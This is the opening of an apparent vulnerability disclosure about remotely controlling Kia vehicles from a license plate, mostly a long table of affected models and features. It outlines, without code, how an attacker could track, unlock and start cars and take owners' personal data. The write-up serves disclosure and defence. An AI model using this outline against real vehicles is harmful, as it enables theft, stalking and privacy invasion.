Hacking Kia: Remotely Controlling Cars With Just a License Plate

Introduction

On June 11th, 2024, we discovered a set of vulnerabilities in Kia vehicles that allowed remote control over key functions using only a license plate. These attacks could be executed remotely on any hardware-equipped vehicle in about 30 seconds, regardless of whether it had an active Kia Connect subscription.

Additionally, an attacker could silently obtain personal information, including the victim’s name, phone number, email address, and physical address. This would allow the attacker to add themselves as an invisible second user on the victim’s vehicle without their knowledge.

We built a tool to demonstrate the impact of these vulnerabilities where an attacker could simply (1) enter the license plate of a Kia vehicle, then (2) execute commands on the vehicle after around 30 seconds. These vulnerabilities have since been fixed, this tool was never released, and the Kia team has validated this was never exploited maliciously.

Vehicles Affected

Vehicle | Geolocate Vehicle | Remote Lock/Unlock | Remote Start/Stop | Remote Horn/Light | Remote Camera
2025 CARNIVAL EX ✅️ ✅️ ✅️ ✅️
2025 CARNIVAL SX ✅️ ✅️ ✅️ ✅️
2025 CARNIVAL LX ✅️ ✅️ ✅️ ✅️
2025 CARNIVAL LXS ✅️ ✅️ ✅️ ✅️
2025 CARNIVAL SX PRESTIGE ✅️ ✅️ ✅️ ✅️
2025 CARNIVAL HYBRID SX PRESTIGE ✅️ ✅️ ✅️ ✅️ ✅️
2025 CARNIVAL HYBRID EX ✅️ ✅️ ✅️ ✅️ ✅️
2025 CARNIVAL HYBRID LXS ✅️ ✅️ ✅️ ✅️ ✅️
2025 CARNIVAL HYBRID SX ✅️ ✅️ ✅️ ✅️ ✅️
2025 K5 EX ✅️ ✅️ ✅️ ✅️ ✅️
2025 K5 GT ✅️ ✅️ ✅️ ✅️ ✅️
2025 K5 GT (GT1 PKG) ✅️ ✅️ ✅️ ✅️ ✅️
2025 K5 GT-LINE ✅️ ✅️ ✅️ ✅️
2025 K5 GT-LINE (PREMIUM PKG) ✅️ ✅️ ✅️ ✅️
2025 K5 LXS ✅️ ✅️ ✅️
2025 SELTOS EX ✅️ ✅️ ✅️ ✅️
2025 SELTOS S ✅️ ✅️ ✅️ ✅️
2025 SELTOS SX ✅️ ✅️ ✅️ ✅️
2025 SELTOS X-LINE ✅️ ✅️ ✅️ ✅️
2025 SORENTO PHEV SX-PRESTIGE ✅️ ✅️ ✅️ ✅️ ✅️
2025 SORENTO PHEV EX ✅️ ✅️ ✅️ ✅️
2025 SORENTO LX ✅️ ✅️ ✅️ ✅️
2025 SOUL EX ✅️ ✅️ ✅️ ✅️
2025 SOUL GT-LINE ✅️ ✅️ ✅️ ✅️
2025 SOUL S ✅️ ✅️ ✅️ ✅️
2025 SORENTO HYBRID EX ✅️ ✅️ ✅️ ✅️
2025 SORENTO HYBRID SX-PRESTIGE ✅️ ✅️ ✅️ ✅️ ✅️
2025 SPORTAGE SX ✅️ ✅️ ✅️ ✅️ ✅️
2025 SPORTAGE X-LINE ✅️ ✅️ ✅️ ✅️ ✅️
2025 SPORTAGE X-PRO ✅️ ✅️ ✅️ ✅️ ✅️
2025 SPORTAGE EX ✅️ ✅️ ✅️ ✅️ ✅️
2025 SPORTAGE SX-PRESTIGE ✅️ ✅️ ✅️ ✅️ ✅️
2025 SPORTAGE X-PRO PRESTIGE ✅️ ✅️ ✅️ ✅️ ✅️
2025 SPORTAGE HYBRID EX ✅️ ✅️ ✅️ ✅️ ✅️
2025 SPORTAGE HYBRID SX-PRESTIGE ✅️ ✅️ ✅️ ✅️ ✅️
2025 SPORTAGE PHEV X-LINE ✅️ ✅️ ✅️ ✅️
2025 SPORTAGE PHEV X-LINE PRESTIGE ✅️ ✅️ ✅️ ✅️ ✅️
2024 CARNIVAL SX ✅️ ✅️ ✅️ ✅️
2024 CARNIVAL EX ✅️ ✅️ ✅️ ✅️
2024 CARNIVAL SX PRESTIGE ✅️ ✅️ ✅️ ✅️
2024 EV6 GT ✅️ ✅️ ✅️ ✅️
2024 EV6 GT-LINE ✅️ ✅️ ✅️ ✅️
2024 EV6 LIGHT ✅️ ✅️ ✅️ ✅️
2024 EV6 WIND ✅️ ✅️ ✅️ ✅️
2024 EV9 LAND ✅️ ✅️ ✅️ ✅️
2024 EV9 GT-LINE ✅️ ✅️ ✅️ ✅️
2024 EV9 LIGHT LR ✅️ ✅️ ✅️ ✅️
2024 EV9 LIGHT SR ✅️ ✅️ ✅️ ✅️
2024 EV9 WIND ✅️ ✅️ ✅️ ✅️
2024 FORTE GT ✅️ ✅️ ✅️ ✅️
2024 FORTE GT-LINE ✅️ ✅️ ✅️ ✅️
2024 K5 EX ✅️ ✅️ ✅️ ✅️
2024 K5 GT ✅️ ✅️ ✅️ ✅️
2024 K5 GT-LINE ✅️ ✅️ ✅️ ✅️
2024 NIRO SX ✅️ ✅️ ✅️ ✅️
2024 NIRO EX ✅️ ✅️ ✅️ ✅️
2024 NIRO EX TOURING ✅️ ✅️ ✅️ ✅️
2024 NIRO SX TOURING ✅️ ✅️ ✅️ ✅️
2024 NIRO PHEV SX TOURING ✅️ ✅️ ✅️ ✅️
2024 NIRO PHEV EX ✅️ ✅️ ✅️ ✅️
2024 SELTOS EX ✅️ ✅️ ✅️ ✅️
2024 SELTOS SX ✅️ ✅️ ✅️ ✅️
2024 SELTOS S ✅️ ✅️ ✅️ ✅️
2024 SELTOS SX (SUNROOF PKG) ✅️ ✅️ ✅️ ✅️
2024 SELTOS X-LINE ✅️ ✅️ ✅️ ✅️
2024 NIRO EV WAVE ✅️ ✅️ ✅️ ✅️
2024 NIRO EV WIND ✅️ ✅️ ✅️ ✅️
2024 SORENTO X-LINE EX ✅️ ✅️ ✅️ ✅️ ✅️
2024 SORENTO EX ✅️ ✅️ ✅️ ✅️ ✅️
2024 SORENTO LX ✅️ ✅️ ✅️ ✅️ ✅️
2024 SORENTO S ✅️ ✅️ ✅️ ✅️ ✅️
2024 SORENTO SX ✅️ ✅️ ✅️ ✅️ ✅️
2024 SORENTO X-LINE SX ✅️ ✅️ ✅️ ✅️ ✅️
2024 SORENTO X-LINE SX-P ✅️ ✅️ ✅️ ✅️ ✅️
2024 SORENTO HYBRID SX-PRESTIGE ✅️ ✅️ ✅️ ✅️ ✅️
2024 SORENTO HYBRID EX ✅️ ✅️ ✅️ ✅️
2024 SORENTO PHEV SX-PRESTIGE ✅️ ✅️ ✅️ ✅️ ✅️
2024 SOUL EX ✅️ ✅️ ✅️ ✅️
2024 SOUL GT-Line ✅️ ✅️ ✅️ ✅️
2024 SOUL S ✅️ ✅️ ✅️ ✅️
2024 SPORTAGE EX ✅️ ✅️ ✅️ ✅️ ✅️
2024 SPORTAGE SX ✅️ ✅️ ✅️ ✅️ ✅️
2024 SPORTAGE X-LINE ✅️ ✅️ ✅️ ✅️ ✅️
2024 SPORTAGE SX-P ✅️ ✅️ ✅️ ✅️ ✅️
2024 SPORTAGE X-PRO ✅️ ✅️ ✅️ ✅️ ✅️
2024 SPORTAGE X-PRO PRST ✅️ ✅️ ✅️ ✅️ ✅️
2024 SPORTAGE HYBRID EX ✅️ ✅️ ✅️ ✅️ ✅️
2024 SPORTAGE HYBRID SX-PRESTIGE ✅️ ✅️ ✅️ ✅️ ✅️
2024 TELLURIDE SX ✅️ ✅️ ✅️ ✅️
2024 TELLURIDE X-LINE EX ✅️ ✅️ ✅️ ✅️
2024 TELLURIDE LX ✅️ ✅️ ✅️ ✅️
2024 TELLURIDE EX ✅️ ✅️ ✅️ ✅️
2024 TELLURIDE S ✅️ ✅️ ✅️ ✅️
2024 TELLURIDE SX-PRESTIGE ✅️ ✅️ ✅️ ✅️
2024 TELLURIDE X-LINE SX ✅️ ✅️ ✅️ ✅️
2024 TELLURIDE X-LINE SX-PRESTIGE ✅️ ✅️ ✅️ ✅️
2024 TELLURIDE X-PRO SX ✅️ ✅️ ✅️ ✅️
2024 TELLURIDE X-PRO SX-PRESTIGE ✅️ ✅️ ✅️ ✅️
2024 SPORTAGE PHEV X-LINE ✅️ ✅️ ✅️ ✅️
2023 CARNIVAL EX ✅️ ✅️ ✅️ ✅️
2023 CARNIVAL SX ✅️ ✅️ ✅️ ✅️
2023 CARNIVAL SX Prestige ✅️ ✅️ ✅️ ✅️
2023 EV6 GT ✅️ ✅️ ✅️ ✅️
2023 EV6 GT-LINE ✅️ ✅️ ✅️ ✅️
2023 EV6 LIGHT ✅️ ✅️ ✅️ ✅️
2023 EV6 WIND ✅️ ✅️ ✅️ ✅️
2023 K5 EX ✅️ ✅️ ✅️ ✅️
2023 K5 GT ✅️ ✅️ ✅️ ✅️
2023 K5 GT-LINE ✅️ ✅️ ✅️ ✅️
2023 FORTE GT-LINE ✅️ ✅️ ✅️ ✅️
2023 FORTE SX ✅️ ✅️ ✅️ ✅️
2023 NIRO SX ✅️ ✅️ ✅️ ✅️
2023 NIRO SX Touring ✅️ ✅️ ✅️ ✅️
2023 NIRO TOURING ✅️ ✅️ ✅️ ✅️
2023 NIRO EX ✅️ ✅️ ✅️ ✅️
2023 NIRO TOURING SE ✅️ ✅️ ✅️ ✅️
2023 NIRO EX Touring ✅️ ✅️ ✅️ ✅️
2023 NIRO S ✅️ ✅️ ✅️ ✅️
2023 SELTOS Nightfall ✅️ ✅️ ✅️ ✅️
2023 SELTOS EX ✅️ ✅️ ✅️ ✅️
2023 SELTOS SX ✅️ ✅️ ✅️ ✅️
2023 SELTOS S ✅️ ✅️ ✅️ ✅️
2023 SORENTO EX SPORT ✅️ ✅️ ✅️ ✅️ ✅️
2023 SORENTO SX-PRESTIGE ✅️ ✅️ ✅️ ✅️ ✅️
2023 SORENTO S ✅️ ✅️ ✅️ ✅️ ✅️
2023 SORENTO SX ✅️ ✅️ ✅️ ✅️ ✅️
2023 SORENTO X-LINE EX ✅️ ✅️ ✅️ ✅️ ✅️
2023 SORENTO X-LINE SX-PRESTIGE ✅️ ✅️ ✅️ ✅️ ✅️
2023 SORENTO X-LINE S ✅️ ✅️ ✅️ ✅️ ✅️
2023 NIRO EV WAVE ✅️ ✅️ ✅️ ✅️
2023 NIRO EV WIND ✅️ ✅️ ✅️ ✅️
2023 NIRO PHEV EX ✅️ ✅️ ✅️ ✅️
2023 NIRO PHEV SX TOURING ✅️ ✅️ ✅️ ✅️
2023 RIO S ✅️ ✅️ ✅️ ✅️
2023 SORENTO HYBRID SX-P ✅️ ✅️ ✅️ ✅️ ✅️
2023 SORENTO HYBRID EX ✅️ ✅️ ✅️ ✅️
2023 SOUL GT-Line ✅️ ✅️ ✅️ ✅️
2023 SOUL EX ✅️ ✅️ ✅️ ✅️
2023 SOUL S ✅️ ✅️ ✅️ ✅️
2023 SORENTO PHEV SX-PRESTIGE ✅️ ✅️ ✅️ ✅️ ✅️
2023 SPORTAGE EX ✅️ ✅️ ✅️ ✅️ ✅️
2023 SPORTAGE X-Line ✅️ ✅️ ✅️ ✅️ ✅️
2023 SPORTAGE SX ✅️ ✅️ ✅️ ✅️ ✅️
2023 SPORTAGE SX-Prestige ✅️ ✅️ ✅️ ✅️ ✅️
2023 SPORTAGE X-Pro Prestige ✅️ ✅️ ✅️ ✅️ ✅️
2023 SPORTAGE X-Pro ✅️ ✅️ ✅️ ✅️ ✅️
2023 SPORTAGE PHEV X-Line Prestige ✅️ ✅️ ✅️ ✅️ ✅️
2023 SPORTAGE PHEV X-Line ✅️ ✅️ ✅️ ✅️ ✅️
2023 SPORTAGE HYBRID EX ✅️ ✅️ ✅️ ✅️ ✅️
2023 SPORTAGE HYBRID SX-Prestige ✅️ ✅️ ✅️ ✅️ ✅️
2023 TELLURIDE LX ✅️ ✅️ ✅️ ✅️
2023 TELLURIDE EX ✅️ ✅️ ✅️ ✅️
2023 TELLURIDE X-PRO SX-PRESTIGE ✅️ ✅️ ✅️ ✅️
2023 TELLURIDE SX ✅️ ✅️ ✅️ ✅️
2023 TELLURIDE SX-PRESTIGE ✅️ ✅️ ✅️ ✅️
2023 TELLURIDE X-LINE EX ✅️ ✅️ ✅️ ✅️
2023 TELLURIDE X-PRO SX ✅️ ✅️ ✅️ ✅️
2023 TELLURIDE X-LINE SX-PRESTIGE ✅️ ✅️ ✅️ ✅️
2023 STINGER GT-Line ✅️ ✅️ ✅️ ✅️ ✅️
2023 STINGER GT2 ✅️ ✅️ ✅️ ✅️ ✅️
2022 EV6 GT-Line ✅️ ✅️ ✅️ ✅️
2022 EV6 GT-Line (1st Edition) ✅️ ✅️ ✅️ ✅️
2022 EV6 LIGHT ✅️ ✅️ ✅️ ✅️
2022 EV6 WIND ✅️ ✅️ ✅️ ✅️
2022 EV6 WIND (Technology Pkg) ✅️ ✅️ ✅️ ✅️
2022 CARNIVAL EX ✅️ ✅️ ✅️ ✅️
2022 CARNIVAL SX ✅️ ✅️ ✅️ ✅️
2022 CARNIVAL SX PRESTIGE ✅️ ✅️ ✅️ ✅️
2022 FORTE GT ✅️ ✅️ ✅️ ✅️
2022 FORTE GT-Line (Premium) ✅️ ✅️ ✅️ ✅️
2022 FORTE GT (GT2) ✅️ ✅️ ✅️ ✅️
2022 FORTE GT (Technology Pkg) ✅️ ✅️ ✅️ ✅️
2022 FORTE GT-Line ✅️ ✅️ ✅️ ✅️
2022 FORTE GT-Line (Sport Premium) ✅️ ✅️ ✅️ ✅️
2022 FORTE GT-Line (Technology Pkg) ✅️ ✅️ ✅️ ✅️
2022 K5 GL-Line Premium ✅️ ✅️ ✅️ ✅️
2022 K5 EX ✅️ ✅️ ✅️ ✅️
2022 K5 EX (Premium Pkg) ✅️ ✅️ ✅️ ✅️
2022 K5 GT ✅️ ✅️ ✅️ ✅️
2022 K5 GT (GT1 Pkg) ✅️ ✅️ ✅️ ✅️
2022 K5 GT-LINE ✅️ ✅️ ✅️ ✅️
2022 K5 GT-Line (AWD) ✅️ ✅️ ✅️ ✅️
2022 K5 GT-Line (Premium Pkg) ✅️ ✅️ ✅️ ✅️
2022 NIRO EX Premium ✅️ ✅️ ✅️ ✅️
2022 NIRO Touring Special Edition ✅️ ✅️ ✅️ ✅️
2022 NIRO EV EX ✅️ ✅️ ✅️ ✅️
2022 NIRO EV EX (Display) ✅️ ✅️ ✅️ ✅️
2022 NIRO EV EX Premium ✅️ ✅️ ✅️ ✅️
2022 NIRO EV S ✅️ ✅️ ✅️ ✅️
2022 NIRO PHEV EX ✅️ ✅️ ✅️ ✅️
2022 NIRO PHEV EX Premium ✅️ ✅️ ✅️ ✅️
2022 NIRO PHEV LXS ✅️ ✅️ ✅️ ✅️
2022 RIO S (4D/Tech. Pkg) ✅️ ✅️ ✅️ ✅️
2022 RIO S (5D/Tech. Pkg) ✅️ ✅️ ✅️ ✅️
2022 SELTOS EX ✅️ ✅️ ✅️ ✅️
2022 SELTOS Nightfall ✅️ ✅️ ✅️ ✅️
2022 SELTOS S ✅️ ✅️ ✅️ ✅️
2022 SELTOS SX Turbo ✅️ ✅️ ✅️ ✅️
2022 SELTOS SX Turbo (Sunroof) ✅️ ✅️ ✅️ ✅️
2022 SORENTO EX ✅️ ✅️ ✅️ ✅️ ✅️
2022 SORENTO S ✅️ ✅️ ✅️ ✅️ ✅️
2022 SORENTO SX ✅️ ✅️ ✅️ ✅️ ✅️
2022 SORENTO SX Prestige ✅️ ✅️ ✅️ ✅️ ✅️
2022 SORENTO X-Line EX ✅️ ✅️ ✅️ ✅️ ✅️
2022 SORENTO X-Line S ✅️ ✅️ ✅️ ✅️ ✅️
2022 SORENTO X-Line SX Prestige ✅️ ✅️ ✅️ ✅️ ✅️
2022 SORENTO HYBRID S ✅️ ✅️ ✅️ ✅️ ✅️
2022 SORENTO HYBRID EX ✅️ ✅️ ✅️ ✅️
2022 SPORTAGE EX (Technology Pkg) ✅️ ✅️ ✅️ ✅️
2022 SPORTAGE Nightfall (Premium Pkg) ✅️ ✅️ ✅️ ✅️
2022 SPORTAGE SX Turbo ✅️ ✅️ ✅️ ✅️
2022 SORENTO PHEV SX ✅️ ✅️ ✅️ ✅️ ✅️
2022 SORENTO PHEV SX-P ✅️ ✅️ ✅️ ✅️ ✅️
2022 SOUL EXCLAIM ✅️ ✅️ ✅️ ✅️
2022 SOUL GT-LINE ✅️ ✅️ ✅️ ✅️
2022 SOUL X-LINE ✅️ ✅️ ✅️ ✅️
2022 SOUL S ✅️ ✅️ ✅️ ✅️
2022 STINGER GT-Line ✅️ ✅️ ✅️ ✅️ ✅️
2022 STINGER GT1 (Special Edition) ✅️ ✅️ ✅️ ✅️ ✅️
2022 STINGER GT-Line (Sun & Sound) ✅️ ✅️ ✅️ ✅️ ✅️
2022 STINGER GT1 ✅️ ✅️ ✅️ ✅️ ✅️
2022 STINGER GT2 ✅️ ✅️ ✅️ ✅️ ✅️
2022 STINGER GT2 (Special Edition) ✅️ ✅️ ✅️ ✅️ ✅️
2022 TELLURIDE EX (Black Ed, Prem. Pkg, Tow Pkg) ✅️ ✅️ ✅️ ✅️
2022 TELLURIDE EX (Black Ed, Prem. Pkg) ✅️ ✅️ ✅️ ✅️
2022 TELLURIDE EX (Premium Pkg) ✅️ ✅️ ✅️ ✅️
2022 TELLURIDE EX (Premium + Tow Pkg) ✅️ ✅️ ✅️ ✅️
2022 TELLURIDE EX (Std) ✅️ ✅️ ✅️ ✅️
2022 TELLURIDE EX (Towing Pkg) ✅️ ✅️ ✅️ ✅️
2022 TELLURIDE LX (Std) ✅️ ✅️ ✅️ ✅️
2022 TELLURIDE SX (Black Ed, Prestige Pkg) ✅️ ✅️ ✅️ ✅️
2022 TELLURIDE S (Std) ✅️ ✅️ ✅️ ✅️
2022 TELLURIDE SX (Black Ed) ✅️ ✅️ ✅️ ✅️
2022 TELLURIDE SX (Black Ed, Prestige + Tow Pkg) ✅️ ✅️ ✅️ ✅️
2022 TELLURIDE SX (Prestige + Towing Pkg) ✅️ ✅️ ✅️ ✅️
2022 TELLURIDE SX (Prestige Pkg) ✅️ ✅️ ✅️ ✅️
2022 TELLURIDE SX (Std) ✅️ ✅️ ✅️ ✅️
2022 TELLURIDE SX (Towing Pkg) ✅️ ✅️ ✅️ ✅️
2021 FORTE EX ✅️ ✅️ ✅️ ✅️
2021 FORTE GT
2021 FORTE GT (Premium Pkg)
2021 FORTE GT-Line (Premium)
2021 K5 EX ✅️ ✅️ ✅️ ✅️
2021 K5 GT (GT1 Pkg) ✅️ ✅️ ✅️ ✅️
2021 K5 EX (Premium Pkg) ✅️ ✅️ ✅️ ✅️
2021 K5 GT-Line ✅️ ✅️ ✅️ ✅️
2021 K5 GT-Line (Special Ed.) ✅️ ✅️ ✅️ ✅️
2021 K5 LXS (AWD) ✅️ ✅️ ✅️ ✅️
2021 NIRO EV EX ✅️ ✅️ ✅️ ✅️
2021 NIRO EV EX PREMIUM ✅️ ✅️ ✅️ ✅️
2021 NIRO EX PREMIUM ✅️ ✅️ ✅️ ✅️
2021 NIRO TOURING ✅️ ✅️ ✅️ ✅️
2021 NIRO TOURING SPECIAL EDITION ✅️ ✅️ ✅️ ✅️
2021 SEDONA EX
2021 SEDONA SX ✅️
2021 SEDONA EX (Premium Pkg)
2021 NIRO PHEV EX ✅️ ✅️ ✅️ ✅️
2021 NIRO PHEV LXS ✅️ ✅️ ✅️ ✅️
2021 NIRO PHEV EX Premium ✅️ ✅️ ✅️ ✅️
2021 RIO S (4D/Tech. Pkg) ✅️
2021 SELTOS SX Turbo ✅️ ✅️ ✅️ ✅️
2021 SELTOS SX Turbo (Sunroof) ✅️ ✅️ ✅️ ✅️
2021 SORENTO SX ✅️ ✅️ ✅️ ✅️ ✅️
2021 SORENTO EX ✅️ ✅️ ✅️ ✅️
2021 SORENTO EX (Pano Pkg) ✅️ ✅️ ✅️ ✅️
2021 SORENTO S ✅️ ✅️ ✅️ ✅️
2021 SORENTO S (Pano Pkg) ✅️ ✅️ ✅️ ✅️
2021 SORENTO SX-P ✅️ ✅️ ✅️ ✅️ ✅️
2021 SORENTO SX-P (X-Line) ✅️ ✅️ ✅️ ✅️ ✅️
2021 SOUL EX ✅️ ✅️ ✅️ ✅️
2021 SOUL Turbo ✅️ ✅️ ✅️ ✅️
2021 STINGER GT-Line (Sun & Sound Pkg) ✅️
2021 STINGER GT
2021 STINGER GT-Line
2021 STINGER GT1 ✅️
2021 STINGER GT2 ✅️
2021 SPORTAGE EX (Technology Pkg) ✅️ ✅️ ✅️ ✅️
2021 SPORTAGE S (Premium Pkg) ✅️ ✅️ ✅️ ✅️
2021 SPORTAGE SX Turbo ✅️ ✅️ ✅️ ✅️
2021 TELLURIDE EX (Black Ed, Prem. Pkg, Tow Pkg) ✅️ ✅️ ✅️ ✅️
2021 TELLURIDE EX ✅️ ✅️ ✅️ ✅️
2021 TELLURIDE EX (Premium + Tow Pkg) ✅️ ✅️ ✅️ ✅️
2021 TELLURIDE EX (Premium Pkg) ✅️ ✅️ ✅️ ✅️
2021 TELLURIDE SX (Black Ed, Prestige Pkg) ✅️ ✅️ ✅️ ✅️
2021 TELLURIDE EX (Towing Pkg) ✅️ ✅️ ✅️ ✅️
2021 TELLURIDE SX (Black Ed, Tow Pkg) ✅️ ✅️ ✅️ ✅️
2021 TELLURIDE LX ✅️ ✅️ ✅️ ✅️
2021 TELLURIDE S ✅️ ✅️ ✅️ ✅️
2021 TELLURIDE SX ✅️ ✅️ ✅️ ✅️
2021 TELLURIDE SX (Black Ed) ✅️ ✅️ ✅️ ✅️
2021 TELLURIDE SX (Prestige + Towing Pkg) ✅️ ✅️ ✅️ ✅️
2021 TELLURIDE SX (Black Ed, Prestige + Tow Pkg) ✅️ ✅️ ✅️ ✅️
2021 TELLURIDE SX (Prestige Pkg) ✅️ ✅️ ✅️ ✅️
2021 TELLURIDE SX (Std) ✅️ ✅️ ✅️ ✅️
2021 TELLURIDE SX (Towing Pkg) ✅️ ✅️ ✅️ ✅️
2020 FORTE EX (Special Edition) ✅️ ✅️ ✅️ ✅️
2020 FORTE GT (GT2) (Auto Climate)
2020 FORTE EX
2020 FORTE GT-Line (Premium)
2020 FORTE GT-Line (Premium, Auto Climate)
2020 FORTE GT
2020 FORTE GT (Auto Climate)
2020 FORTE GT (GT2)
2020 CADENZA Limited ✅️ ✅️ ✅️ ✅️
2020 CADENZA Technology ✅️ ✅️ ✅️ ✅️
2020 K900 Luxury ✅️ ✅️ ✅️ ✅️
2020 NIRO EV EX ✅️ ✅️ ✅️ ✅️
2020 NIRO EV EX Premium ✅️ ✅️ ✅️ ✅️
2020 NIRO PHEV LXS ✅️ ✅️ ✅️ ✅️
2020 NIRO PHEV EX ✅️ ✅️ ✅️ ✅️
2020 NIRO PHEV EX Premium ✅️ ✅️ ✅️ ✅️
2020 NIRO EX Premium ✅️ ✅️ ✅️ ✅️
2020 NIRO Touring Special Edition ✅️ ✅️ ✅️ ✅️
2020 NIRO Touring ✅️ ✅️ ✅️ ✅️
2020 OPTIMA EX Premium ✅️ ✅️ ✅️ ✅️
2020 OPTIMA PHEV EX (Technology Pkg) ✅️ ✅️ ✅️ ✅️
2020 SEDONA EX (Premium Pkg, Rear Seat Ent. )
2020 SEDONA EX
2020 SEDONA EX (Premium Pkg)
2020 SEDONA EX (Rear Seat Ent.)
2020 SEDONA SX ✅️
2020 SEDONA SX (Rear Seat Ent.) ✅️
2020 RIO S (4D/Tech. Pkg)
2020 RIO S (5D/Tech. Pkg)
2020 SOUL EX ✅️ ✅️ ✅️ ✅️
2020 SOUL EX (Designer) ✅️ ✅️ ✅️ ✅️
2020 SOUL GT 1.6L Turbo ✅️ ✅️ ✅️ ✅️
2020 SORENTO SX ✅️ ✅️ ✅️ ✅️
2020 SPORTAGE EX (Technology Pkg) ✅️ ✅️ ✅️ ✅️
2020 SPORTAGE S (Premium Pkg) ✅️ ✅️ ✅️ ✅️
2020 SPORTAGE SX Turbo (Beige) ✅️ ✅️ ✅️ ✅️
2020 SPORTAGE SX Turbo (Std) ✅️ ✅️ ✅️ ✅️
2020 TELLURIDE EX (Premium + Tow Pkg) ✅️ ✅️ ✅️ ✅️
2020 TELLURIDE EX (Premium Pkg) ✅️ ✅️ ✅️ ✅️
2020 TELLURIDE S (8 Passenger) ✅️ ✅️ ✅️ ✅️
2020 TELLURIDE EX ✅️ ✅️ ✅️ ✅️
2020 TELLURIDE SX (Prestige Pkg) ✅️ ✅️ ✅️ ✅️
2020 TELLURIDE EX (Towing Pkg) ✅️ ✅️ ✅️ ✅️
2020 TELLURIDE LX ✅️ ✅️ ✅️ ✅️
2020 TELLURIDE S ✅️ ✅️ ✅️ ✅️
2020 TELLURIDE SX ✅️ ✅️ ✅️ ✅️
2020 TELLURIDE SX (Prestige + Towing Pkg) ✅️ ✅️ ✅️ ✅️
2020 TELLURIDE SX (Towing Pkg) ✅️ ✅️ ✅️ ✅️
2020 STINGER GT
2020 STINGER GT-Line
2020 STINGER GT1 ✅️
2020 STINGER GT2 ✅️
2019 FORTE EX
2019 FORTE S (Premium)
2019 FORTE EX (Launch) ✅️
2019 FORTE S
2019 CADENZA Cadenza (Ltd) ✅️
2019 CADENZA Cadenza (Premium)
2019 CADENZA Cadenza (Technology) ✅️
2019 NIRO EX (Adv. Technology)
2019 NIRO EX (Premium) ✅️
2019 NIRO LX
2019 NIRO LX (Adv. Tech)
2019 NIRO EX (Std)
2019 NIRO FE
2019 NIRO S Touring ✅️
2019 NIRO Touring ✅️
2019 K900 Luxury ✅️ ✅️ ✅️ ✅️
2019 K900 Luxury (VIP) ✅️ ✅️ ✅️ ✅️
2019 NIRO EV EX (Battery Heater) ✅️ ✅️ ✅️ ✅️
2019 NIRO EV EX ✅️ ✅️ ✅️ ✅️
2019 NIRO EV EX (Battery Heater, Wireless Charger) ✅️ ✅️ ✅️ ✅️
2019 NIRO EV EX Premium ✅️ ✅️ ✅️ ✅️
2019 NIRO EV EX Premium (Battery Heater) ✅️ ✅️ ✅️ ✅️
2019 NIRO EV EX Premium (Launch Ed.) ✅️ ✅️ ✅️ ✅️
2019 NIRO EV EX Premium (Launch Ed., Battery Heater) ✅️ ✅️ ✅️ ✅️
2019 NIRO PHEV EX ✅️ ✅️ ✅️ ✅️
2019 NIRO PHEV EX Premium ✅️ ✅️ ✅️ ✅️
2019 NIRO PHEV LX ✅️ ✅️ ✅️ ✅️
2019 OPTIMA EX ✅️ ✅️ ✅️ ✅️
2019 OPTIMA EX (Premium Pkg) ✅️ ✅️ ✅️ ✅️
2019 OPTIMA EX AT (Premium Pkg) ✅️ ✅️ ✅️ ✅️
2019 OPTIMA LX AT (Premium) ✅️ ✅️ ✅️
2019 OPTIMA S ✅️ ✅️ ✅️ ✅️
2019 OPTIMA SX Turbo ✅️ ✅️ ✅️ ✅️
2019 OPTIMA SX Turbo (Ltd) ✅️ ✅️ ✅️ ✅️
2019 OPTIMA HYBRID EX (Technology Pkg) ✅️
2019 OPTIMA PHEV EX ✅️ ✅️ ✅️ ✅️
2019 OPTIMA PHEV EX (Technology Pkg) ✅️ ✅️ ✅️ ✅️
2019 RIO S AT(4D/Technology Pkg)
2019 RIO S AT(5D/Technology Pkg)
2019 SEDONA EX
2019 SEDONA EX (Premium + Rear Ent.)
2019 SEDONA EX (Premium Pkg)
2019 SEDONA EX AT (Rear Ent. Sys)
2019 SEDONA S (Rear Ent. Sys) ✅️
2019 SEDONA SX ✅️
2019 SORENTO EX Sport
2019 SORENTO EX ✅️
2019 SORENTO EX (Touring Pkg) ✅️
2019 SORENTO Limited ✅️
2019 SORENTO EX (Touring) ✅️
2019 SORENTO LX (Convenience)
2019 SORENTO SX ✅️
2019 SOUL LX
2019 SOUL Exclaim ✅️
2019 SOUL Plus ✅️
2019 SPORTAGE EX (Premium Pkg + Technology Pkg) ✅️
2019 SPORTAGE EX (Sports Appearance Pkg)
2019 SPORTAGE EX
2019 SPORTAGE EX (Premium Pkg)
2019 SPORTAGE LX (Popular Pkg)
2019 SPORTAGE SX ✅️
2019 SPORTAGE SX (Turbo Pkg) ✅️
2019 SOUL EV Soul EV ✅️ ✅️ ✅️ ✅️
2019 SOUL EV Soul EV+ ✅️ ✅️ ✅️ ✅️
2019 STINGER GT
2019 STINGER Premium ✅️
2019 STINGER GT1 ✅️
2019 STINGER GT2 ✅️
2019 STINGER GTS ✅️
2019 STINGER Stinger
2019 STINGER Stinger (Sun and Sound) ✅️
2018 CADENZA Cadenza (Premium Pkg) ✅️
2018 CADENZA Limited ✅️
2018 CADENZA Premium (Luxury + Technology) ✅️
2018 FORTE EX
2018 FORTE EX
2018 FORTE EX (Premium Pkg + Technology Pkg) ✅️
2018 FORTE LX (Popular Pkg)
2018 FORTE LX
2018 FORTE SX AT
2018 FORTE S
2018 FORTE SX MT
2018 NIRO LX
2018 NIRO EX
2018 NIRO EX (Technology Pkg)
2018 NIRO EX (Premium Pkg) ✅️
2018 NIRO EX (Touring Pkg)
2018 NIRO FE
2018 NIRO Touring ✅️
2018 NIRO PHEV EX ✅️ ✅️ ✅️ ✅️
2018 NIRO PHEV EX Premium ✅️ ✅️ ✅️ ✅️
2018 NIRO PHEV LX ✅️ ✅️ ✅️ ✅️
2018 OPTIMA LX
2018 OPTIMA EX
2018 OPTIMA EX (Premium Pkg + Technology Pkg) ✅️
2018 OPTIMA S (Convenience)
2018 OPTIMA EX (Premium) ✅️
2018 OPTIMA LX (Convenience)
2018 OPTIMA LX Turbo
2018 OPTIMA S
2018 OPTIMA SX Turbo ✅️
2018 OPTIMA SX Turbo (Limited Pkg + Technology Pkg) ✅️
2018 OPTIMA SX Turbo (Technology Pkg) ✅️
2018 OPTIMA HYBRID LX
2018 OPTIMA HYBRID EX (Technology Pkg) ✅️
2018 OPTIMA HYBRID EX ✅️
2018 OPTIMA HYBRID LX (Convenience)
2018 RIO EX (4D)
2018 RIO EX (5D)
2018 SEDONA LX (Essentials + Adv Technology Pkg)
2018 SEDONA EX
2018 SEDONA LX (Essentials Pkg)
2018 SEDONA Limited ✅️
2018 SEDONA SX ✅️
2018 SORENTO EX
2018 SORENTO LX
2018 SORENTO EX (Touring Pkg)
